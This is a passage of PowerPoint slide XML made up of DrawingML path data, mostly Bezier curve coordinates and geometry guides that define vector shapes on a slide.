                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="256" y="22"/>
                    <a:pt x="253" y="19"/>
                    <a:pt x="249" y="19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254" y="17"/>
                    <a:pt x="257" y="14"/>
                    <a:pt x="257" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="256" y="3"/>
                    <a:pt x="252" y="0"/>
                    <a:pt x="243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8" y="38"/>
                    <a:pt x="228" y="38"/>
                    <a:pt x="228" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="236" y="38"/>
                    <a:pt x="236" y="38"/>
                    <a:pt x="236" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="236" y="23"/>
                    <a:pt x="236" y="23"/>
                    <a:pt x="236" y="23"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="298" y="15"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="298" y="8"/>
                    <a:pt x="295" y="4"/>
                    <a:pt x="287" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="277" y="1"/>
                    <a:pt x="271" y="4"/>
                    <a:pt x="269" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="268" y="17"/>
                    <a:pt x="272" y="21"/>
                    <a:pt x="280" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="280" y="25"/>
                    <a:pt x="281" y="25"/>
                    <a:pt x="281" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="286" y="27"/>
                    <a:pt x="288" y="29"/>
                    <a:pt x="288" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="287" y="34"/>
                    <a:pt x="284" y="36"/>
                    <a:pt x="280" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="275" y="34"/>
                    <a:pt x="274" y="32"/>
                    <a:pt x="274" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="266" y="26"/>
                    <a:pt x="266" y="26"/>
                    <a:pt x="266" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="265" y="34"/>
                    <a:pt x="269" y="39"/>
                    <a:pt x="279" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="289" y="42"/>
                    <a:pt x="295" y="39"/>
                    <a:pt x="297" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="298" y="26"/>
                    <a:pt x="294" y="21"/>
                    <a:pt x="285" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="285" y="18"/>
                    <a:pt x="284" y="18"/>
                    <a:pt x="284" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="279" y="17"/>
                    <a:pt x="277" y="15"/>
                    <a:pt x="278" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="279" y="9"/>
                    <a:pt x="281" y="7"/>
                    <a:pt x="285" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="289" y="8"/>
                    <a:pt x="290" y="11"/>
                    <a:pt x="290" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="298" y="15"/>
                    <a:pt x="298" y="15"/>
                    <a:pt x="298" y="15"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="322" y="11"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="314" y="8"/>
                    <a:pt x="314" y="8"/>
                    <a:pt x="314" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="303" y="45"/>
                    <a:pt x="303" y="45"/>
                    <a:pt x="303" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="311" y="47"/>
                    <a:pt x="311" y="47"/>
                    <a:pt x="311" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="322" y="11"/>
                    <a:pt x="322" y="11"/>
                    <a:pt x="322" y="11"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="330" y="20"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="340" y="24"/>
                    <a:pt x="340" y="24"/>
                    <a:pt x="340" y="24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48" y="27"/>
                    <a:pt x="348" y="27"/>
                    <a:pt x="348" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="358" y="31"/>
                    <a:pt x="358" y="31"/>
                    <a:pt x="358" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="361" y="25"/>
                    <a:pt x="361" y="25"/>
                    <a:pt x="361" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="332" y="14"/>
                    <a:pt x="332" y="14"/>
                    <a:pt x="332" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="330" y="20"/>
                    <a:pt x="330" y="20"/>
                    <a:pt x="330" y="20"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="361" y="70"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="367" y="60"/>
                    <a:pt x="367" y="60"/>
                    <a:pt x="367" y="60"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="371" y="31"/>
                    <a:pt x="371" y="31"/>
                    <a:pt x="371" y="31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376" y="55"/>
                    <a:pt x="376" y="55"/>
                    <a:pt x="376" y="55"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="392" y="45"/>
                    <a:pt x="392" y="45"/>
                    <a:pt x="392" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="399" y="50"/>
                    <a:pt x="399" y="50"/>
                    <a:pt x="399" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="374" y="64"/>
                    <a:pt x="374" y="64"/>
                    <a:pt x="374" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="367" y="75"/>
                    <a:pt x="367" y="75"/>
                    <a:pt x="367" y="75"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="361" y="70"/>
                    <a:pt x="361" y="70"/>
                    <a:pt x="361" y="70"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="403" y="107"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="412" y="115"/>
                    <a:pt x="420" y="115"/>
                    <a:pt x="430" y="107"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="439" y="97"/>
                    <a:pt x="440" y="88"/>
                    <a:pt x="432" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="423" y="71"/>
                    <a:pt x="414" y="71"/>
                    <a:pt x="405" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="396" y="89"/>
                    <a:pt x="395" y="98"/>
                    <a:pt x="403" y="107"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="427" y="84"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="432" y="88"/>
                    <a:pt x="431" y="94"/>
                    <a:pt x="424" y="100"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="417" y="107"/>
                    <a:pt x="412" y="108"/>
                    <a:pt x="407" y="103"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="403" y="98"/>
                    <a:pt x="404" y="93"/>
                    <a:pt x="411" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="417" y="80"/>
                    <a:pt x="423" y="79"/>
                    <a:pt x="427" y="84"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="425" y="134"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="421" y="127"/>
                    <a:pt x="421" y="127"/>
                    <a:pt x="421" y="127"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="453" y="107"/>
                    <a:pt x="453" y="107"/>
                    <a:pt x="453" y="107"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="466" y="128"/>
                    <a:pt x="466" y="128"/>
                    <a:pt x="466" y="128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="461" y="132"/>
                    <a:pt x="461" y="132"/>
                    <a:pt x="461" y="132"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="452" y="118"/>
                    <a:pt x="452" y="118"/>
                    <a:pt x="452" y="118"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="444" y="122"/>
                    <a:pt x="444" y="122"/>
                    <a:pt x="444" y="122"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="453" y="135"/>
                    <a:pt x="453" y="135"/>
                    <a:pt x="453" y="135"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="447" y="139"/>
                    <a:pt x="447" y="139"/>
                    <a:pt x="447" y="139"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="439" y="126"/>
                    <a:pt x="439" y="126"/>
                    <a:pt x="439" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="425" y="134"/>
                    <a:pt x="425" y="134"/>
                    <a:pt x="425" y="134"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="477" y="187"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="485" y="183"/>
                    <a:pt x="487" y="177"/>
                    <a:pt x="484" y="167"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="481" y="158"/>
                    <a:pt x="473" y="155"/>
                    <a:pt x="460" y="158"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="448" y="162"/>
                    <a:pt x="444" y="169"/>
                    <a:pt x="447" y="179"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="450" y="189"/>
                    <a:pt x="456" y="193"/>
                    <a:pt x="464" y="191"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="461" y="182"/>
                    <a:pt x="461" y="182"/>
                    <a:pt x="461" y="182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="457" y="184"/>
                    <a:pt x="454" y="182"/>
                    <a:pt x="452" y="178"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="451" y="173"/>
                    <a:pt x="455" y="169"/>
                    <a:pt x="463" y="166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="472" y="164"/>
                    <a:pt x="477" y="165"/>
                    <a:pt x="479" y="169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="480" y="174"/>
                    <a:pt x="478" y="177"/>
                    <a:pt x="474" y="178"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="477" y="187"/>
                    <a:pt x="477" y="187"/>
                    <a:pt x="477" y="187"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="455" y="210"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="472" y="207"/>
                    <a:pt x="472" y="207"/>
                    <a:pt x="472" y="207"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="474" y="221"/>
                    <a:pt x="474" y="221"/>
                    <a:pt x="474" y="221"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="458" y="224"/>
                    <a:pt x="458" y="224"/>
                    <a:pt x="458" y="224"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="459" y="232"/>
                    <a:pt x="459" y="232"/>
                    <a:pt x="459" y="232"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="497" y="225"/>
                    <a:pt x="497" y="225"/>
                    <a:pt x="497" y="225"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="495" y="217"/>
                    <a:pt x="495" y="217"/>
                    <a:pt x="495" y="217"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="481" y="220"/>
                    <a:pt x="481" y="220"/>
                    <a:pt x="481" y="220"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="478" y="205"/>
                    <a:pt x="478" y="205"/>
                    <a:pt x="478" y="205"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="493" y="203"/>
                    <a:pt x="493" y="203"/>
                    <a:pt x="493" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="491" y="195"/>
                    <a:pt x="491" y="195"/>
                    <a:pt x="491" y="195"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="454" y="202"/>
                    <a:pt x="454" y="202"/>
                    <a:pt x="454" y="202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="455" y="210"/>
                    <a:pt x="455" y="210"/>
                    <a:pt x="455" y="210"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="497" y="249"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="497" y="241"/>
                    <a:pt x="497" y="241"/>
                    <a:pt x="497" y="241"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="459" y="242"/>
                    <a:pt x="459" y="242"/>
                    <a:pt x="459" y="242"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="459" y="250"/>
                    <a:pt x="459" y="250"/>
                    <a:pt x="459" y="250"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="497" y="249"/>
                    <a:pt x="497" y="249"/>
                    <a:pt x="497" y="249"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="454" y="294"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="492" y="299"/>
                    <a:pt x="492" y="299"/>
                    <a:pt x="492" y="299"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="493" y="291"/>
                    <a:pt x="493" y="291"/>
                    <a:pt x="493" y="291"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="463" y="287"/>
                    <a:pt x="463" y="287"/>
                    <a:pt x="463" y="287"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="463" y="287"/>
                    <a:pt x="463" y="287"/>
                    <a:pt x="463" y="287"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="495" y="277"/>
                    <a:pt x="495" y="277"/>
                    <a:pt x="495" y="277"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="496" y="265"/>
                    <a:pt x="496" y="265"/>
                    <a:pt x="496" y="265"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="458" y="260"/>
                    <a:pt x="458" y="260"/>
                    <a:pt x="458" y="260"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="457" y="267"/>
                    <a:pt x="457" y="267"/>
                    <a:pt x="457" y="267"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="489" y="271"/>
                    <a:pt x="489" y="271"/>
                    <a:pt x="489" y="271"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="489" y="272"/>
                    <a:pt x="489" y="272"/>
                    <a:pt x="489" y="272"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="456" y="282"/>
                    <a:pt x="456" y="282"/>
                    <a:pt x="456" y="282"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="454" y="294"/>
                    <a:pt x="454" y="294"/>
                    <a:pt x="454" y="294"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="450" y="308"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="456" y="313"/>
                    <a:pt x="456" y="313"/>
                    <a:pt x="456" y="313"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="451" y="327"/>
                    <a:pt x="451" y="327"/>
                    <a:pt x="451" y="327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="443" y="327"/>
                    <a:pt x="443" y="327"/>
                    <a:pt x="443" y="327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="440" y="335"/>
                    <a:pt x="440" y="335"/>
                    <a:pt x="440" y="335"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="481" y="335"/>
                    <a:pt x="481" y="335"/>
                    <a:pt x="481" y="335"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="484" y="326"/>
                    <a:pt x="484" y="326"/>
                    <a:pt x="484" y="326"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="452" y="300"/>
                    <a:pt x="452" y="300"/>
                    <a:pt x="452" y="300"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="450" y="308"/>
                    <a:pt x="450" y="308"/>
                    <a:pt x="450" y="308"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="462" y="317"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="475" y="328"/>
                    <a:pt x="475" y="328"/>
                    <a:pt x="475" y="328"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="475" y="328"/>
                    <a:pt x="475" y="328"/>
                    <a:pt x="475" y="328"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="458" y="327"/>
                    <a:pt x="458" y="327"/>
                    <a:pt x="458" y="327"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="462" y="3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Sļïḓê"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8400175" y="2903012"/>
              <a:ext cx="400822" cy="396732"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 64 w 124"/>
                <a:gd name="T1" fmla="*/ 67 h 123"/>
                <a:gd name="T2" fmla="*/ 66 w 124"/>
                <a:gd name="T3" fmla="*/ 73 h 123"/>
                <a:gd name="T4" fmla="*/ 48 w 124"/>
                <a:gd name="T5" fmla="*/ 76 h 123"/>
                <a:gd name="T6" fmla="*/ 30 w 124"/>
                <a:gd name="T7" fmla="*/ 63 h 123"/>
                <a:gd name="T8" fmla="*/ 33 w 124"/>
                <a:gd name="T9" fmla="*/ 65 h 123"/>
                <a:gd name="T10" fmla="*/ 26 w 124"/>
                <a:gd name="T11" fmla="*/ 74 h 123"/>
                <a:gd name="T12" fmla="*/ 30 w 124"/>
                <a:gd name="T13" fmla="*/ 63 h 123"/>
                <a:gd name="T14" fmla="*/ 61 w 124"/>
                <a:gd name="T15" fmla="*/ 32 h 123"/>
                <a:gd name="T16" fmla="*/ 65 w 124"/>
                <a:gd name="T17" fmla="*/ 49 h 123"/>
                <a:gd name="T18" fmla="*/ 55 w 124"/>
                <a:gd name="T19" fmla="*/ 31 h 123"/>
                <a:gd name="T20" fmla="*/ 48 w 124"/>
                <a:gd name="T21" fmla="*/ 23 h 123"/>
                <a:gd name="T22" fmla="*/ 42 w 124"/>
                <a:gd name="T23" fmla="*/ 28 h 123"/>
                <a:gd name="T24" fmla="*/ 36 w 124"/>
                <a:gd name="T25" fmla="*/ 43 h 123"/>
                <a:gd name="T26" fmla="*/ 30 w 124"/>
                <a:gd name="T27" fmla="*/ 39 h 123"/>
                <a:gd name="T28" fmla="*/ 21 w 124"/>
                <a:gd name="T29" fmla="*/ 34 h 123"/>
                <a:gd name="T30" fmla="*/ 5 w 124"/>
                <a:gd name="T31" fmla="*/ 52 h 123"/>
                <a:gd name="T32" fmla="*/ 0 w 124"/>
                <a:gd name="T33" fmla="*/ 73 h 123"/>
                <a:gd name="T34" fmla="*/ 2 w 124"/>
                <a:gd name="T35" fmla="*/ 85 h 123"/>
                <a:gd name="T36" fmla="*/ 14 w 124"/>
                <a:gd name="T37" fmla="*/ 89 h 123"/>
                <a:gd name="T38" fmla="*/ 30 w 124"/>
                <a:gd name="T39" fmla="*/ 83 h 123"/>
                <a:gd name="T40" fmla="*/ 36 w 124"/>
                <a:gd name="T41" fmla="*/ 91 h 123"/>
                <a:gd name="T42" fmla="*/ 8 w 124"/>
                <a:gd name="T43" fmla="*/ 115 h 123"/>
                <a:gd name="T44" fmla="*/ 105 w 124"/>
                <a:gd name="T45" fmla="*/ 97 h 123"/>
                <a:gd name="T46" fmla="*/ 91 w 124"/>
                <a:gd name="T47" fmla="*/ 116 h 123"/>
                <a:gd name="T48" fmla="*/ 92 w 124"/>
                <a:gd name="T49" fmla="*/ 120 h 123"/>
                <a:gd name="T50" fmla="*/ 122 w 124"/>
                <a:gd name="T51" fmla="*/ 97 h 123"/>
                <a:gd name="T52" fmla="*/ 107 w 124"/>
                <a:gd name="T53" fmla="*/ 78 h 123"/>
                <a:gd name="T54" fmla="*/ 85 w 124"/>
                <a:gd name="T55" fmla="*/ 79 h 123"/>
                <a:gd name="T56" fmla="*/ 83 w 124"/>
                <a:gd name="T57" fmla="*/ 59 h 123"/>
                <a:gd name="T58" fmla="*/ 77 w 124"/>
                <a:gd name="T59" fmla="*/ 38 h 123"/>
                <a:gd name="T60" fmla="*/ 94 w 124"/>
                <a:gd name="T61" fmla="*/ 16 h 123"/>
                <a:gd name="T62" fmla="*/ 85 w 124"/>
                <a:gd name="T63" fmla="*/ 6 h 123"/>
                <a:gd name="T64" fmla="*/ 81 w 124"/>
                <a:gd name="T65" fmla="*/ 0 h 123"/>
                <a:gd name="T66" fmla="*/ 70 w 124"/>
                <a:gd name="T67" fmla="*/ 1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4" h="123">
                  <a:moveTo>
                    <a:pt x="48" y="74"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="63"/>
                    <a:pt x="56" y="67"/>
                    <a:pt x="64" y="67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64" y="76"/>
                    <a:pt x="58" y="82"/>
                    <a:pt x="53" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="82"/>
                    <a:pt x="48" y="79"/>
                    <a:pt x="48" y="76"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="74"/>
                    <a:pt x="48" y="74"/>
                    <a:pt x="48" y="74"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="30" y="63"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="64"/>
                    <a:pt x="30" y="64"/>
                    <a:pt x="30" y="64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8"/>
                    <a:pt x="34" y="76"/>
                    <a:pt x="30" y="76"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="76"/>
                    <a:pt x="29" y="75"/>
                    <a:pt x="26" y="74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30" y="63"/>
                    <a:pt x="30" y="63"/>
                    <a:pt x="30" y="63"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="61" y="29"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="32"/>
                    <a:pt x="61" y="32"/>
                    <a:pt x="61" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="37"/>
                    <a:pt x="65" y="41"/>
                    <a:pt x="65" y="45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53"/>
                    <a:pt x="62" y="56"/>
                    <a:pt x="58" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="56"/>
                    <a:pt x="55" y="37"/>
                    <a:pt x="55" y="31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26"/>
                    <a:pt x="51" y="23"/>
                    <a:pt x="48" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="23"/>
                    <a:pt x="44" y="24"/>
                    <a:pt x="43" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="27"/>
                    <a:pt x="42" y="27"/>
                    <a:pt x="42" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="30"/>
                    <a:pt x="41" y="28"/>
                    <a:pt x="40" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="31"/>
                    <a:pt x="36" y="42"/>
                    <a:pt x="36" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="43"/>
                    <a:pt x="35" y="44"/>
                    <a:pt x="34" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="44"/>
                    <a:pt x="31" y="40"/>
                    <a:pt x="30" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="37"/>
                    <a:pt x="24" y="34"/>
                    <a:pt x="23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17" y="34"/>
                    <a:pt x="11" y="37"/>
                    <a:pt x="9" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="43"/>
                    <a:pt x="5" y="48"/>
                    <a:pt x="5" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="54"/>
                    <a:pt x="2" y="57"/>
                    <a:pt x="2" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="66"/>
                    <a:pt x="0" y="71"/>
                    <a:pt x="0" y="7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2" y="84"/>
                    <a:pt x="2" y="85"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="86"/>
                    <a:pt x="8" y="89"/>
                    <a:pt x="10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21" y="89"/>
                    <a:pt x="24" y="83"/>
                    <a:pt x="28" y="83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34" y="83"/>
                    <a:pt x="35" y="86"/>
                    <a:pt x="37" y="87"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="91"/>
                    <a:pt x="36" y="91"/>
                    <a:pt x="36" y="91"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="97"/>
                    <a:pt x="30" y="97"/>
                    <a:pt x="19" y="101"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="104"/>
                    <a:pt x="8" y="105"/>
                    <a:pt x="8" y="115"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="123"/>
                    <a:pt x="44" y="103"/>
                    <a:pt x="53" y="98"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="96"/>
                    <a:pt x="105" y="85"/>
                    <a:pt x="105" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="98"/>
                    <a:pt x="105" y="98"/>
                    <a:pt x="105" y="98"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="102"/>
                    <a:pt x="91" y="109"/>
                    <a:pt x="91" y="116"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="117"/>
                    <a:pt x="91" y="117"/>
                    <a:pt x="91" y="117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="119"/>
                    <a:pt x="91" y="119"/>
                    <a:pt x="92" y="120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109" y="114"/>
                    <a:pt x="118" y="113"/>
                    <a:pt x="122" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="89"/>
                    <a:pt x="123" y="84"/>
                    <a:pt x="116" y="81"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="111" y="80"/>
                    <a:pt x="114" y="78"/>
                    <a:pt x="107" y="78"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="78"/>
                    <a:pt x="99" y="77"/>
                    <a:pt x="95" y="77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3" y="79"/>
                    <a:pt x="81" y="77"/>
                    <a:pt x="81" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="72"/>
                    <a:pt x="79" y="62"/>
                    <a:pt x="83" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="57"/>
                    <a:pt x="96" y="51"/>
                    <a:pt x="96" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="96" y="37"/>
                    <a:pt x="77" y="51"/>
                    <a:pt x="77" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="34"/>
                    <a:pt x="82" y="29"/>
                    <a:pt x="84" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="90" y="21"/>
                    <a:pt x="90" y="25"/>
                    <a:pt x="94" y="16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2"/>
                    <a:pt x="84" y="0"/>
                    <a:pt x="81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3" y="0"/>
                    <a:pt x="73" y="11"/>
                    <a:pt x="70" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="20"/>
                    <a:pt x="61" y="22"/>
